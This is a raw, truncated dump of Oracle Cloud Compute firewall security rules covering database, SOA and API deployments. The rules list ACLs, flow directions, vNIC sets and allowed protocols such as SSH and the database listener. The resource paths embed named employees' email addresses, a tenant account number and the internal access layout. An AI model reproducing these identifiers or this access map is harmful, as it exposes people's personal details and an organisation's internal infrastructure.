{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_p2_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/dblistener'],
'enabledFlag': False}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/sys_infra2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/sys_infra2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ora_db',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3naaccvsb755/db_1/ssh'],
'enabledFlag': True}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_01',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_01',
'description': 'NTAG Digital Evidence Management', 'tags': ['ntagdevm'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_acl_01',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_vnicset_01',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_02',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_02',
'description': 'NTAG Digital Evidence Management', 'tags': ['ntagdevm'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_acl_01', 'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_vnicset_01', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_pfset_01'],
'secProtocols': ['/oracle/public/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_http',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_http',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/http'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbexpress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dbexpress',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dbexpress'], 'enabledFlag': False},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_02',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_02',
'description': 'NAAC CVS Sandbox', 'tags': ['naaccvsb'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_acl_01', 'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_vnicset_01', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_pfset_01'],
'secProtocols': ['/oracle/public/https', '/oracle/public/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_03',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_03',
'description': 'NAAC CVS Sandbox', 'tags': ['naaccvsb'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_acl_01', 'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': None, 'srcIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_pfset_01'],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_pfset_01'], 'secProtocols': [],
'enabledFlag': True}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_03',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_secrule_03',
'description': 'NTAG Digital Evidence Management', 'tags': ['ntagdevm'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_acl_01', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': None,
'srcIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_pfset_01'],
'dstIpAddressPrefixSets': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/ntagdevm_pfset_01'],
'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_01',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_secrule_01',
'description': 'NAAC CVS Sandbox', 'tags': ['naaccvsb'],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_acl_01', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/naaccvsb_vnicset_01', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/sys_infra2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/sys_infra2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_p2_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/dblistener'],
'enabledFlag': False}, {'name': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/dhiru.vallabhbhai@oracle.com/dbaas/gc3ntagdevm713/db_1/ora_db',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [],
'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/sys_infra2otd_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/sys_infra2otd_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/chttp'],
'enabledFlag': True}, {'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/ora_otd2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/chttps'],
'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/ora_otd2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ahttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_p2admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/wls/ora_admin', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttp',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2ms_chttp',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/chttp'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_sys_ms2db_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_sys_ms2db_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbexpress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbexpress',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dbexpress'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_trusted_hosts_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_trusted_hosts_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [
